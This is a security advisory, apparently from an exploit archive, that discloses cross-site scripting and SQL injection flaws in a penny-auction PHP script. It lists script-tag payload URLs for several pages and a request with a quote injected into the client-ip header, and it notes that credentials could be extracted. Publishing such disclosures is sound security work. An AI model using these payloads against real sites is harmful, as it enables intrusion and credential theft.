Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities.

2011.03.18
Credit: Sangteamtham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#------------------------------------------------------------------------------------------------------------------- # Peny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulneribilities. # Author : Sangteamtham # Home : Hcegroup.net # Download :http://www.pennyauctionsoft.com/ # Date :03/20/2011 # Twitter:@Sangte_amtham # #****************************************************************************************** #1.Description: #Pennyauctionsoft is a brand new powerful, effective and feature-rich Swoopo script Clone application # that is ready to use out of the box. #2.Vulnerabilities: # I reported this to the authors. After interesting conversation, everything is still the same until now. # Almost the the files get XSS vuls. I don't think that i will list all, but some of them. #2.a XSS vulnerabilities: # Some of XSS: # http://server/index.php/"<script>alert("XSS")</script> # http://server/jobs.php/"<script>alert("XSS")</script> # http://server/contact.php/"<script>alert("XSS")</script> # http://server/forum/index.php/"<script>alert("XSS")</script> # Many of them are still get vulnerabilities. # #2.b: MySQL injection. # It seems the request to server is not filtered well with client-ip using GET method. # # # http://server/allauctions.php # # Host: www.server.com # User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 # client-ip: 127.0.0.1 ' # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 # Accept-Language: en-us,en;q=0.5 # Accept-Encoding: gzip,deflate # Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 # Keep-Alive: 115 # Connection: keep-alive # Cookie: PHPSESSID=dc3fa290bcf7f865d6c43bb19e607a74 # # As demo, Attacker will get the vulnerability and try to inject and get credential information. # Still vulnerability with : # http://server/allauctions.php # http://server/registration.php # http://server/forum/forum_detail.php # # # #****************************************************************************************** # Greetz to: All Vietnamese hackers and Hackers out there researching for more security #--------------------------------------------------------------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top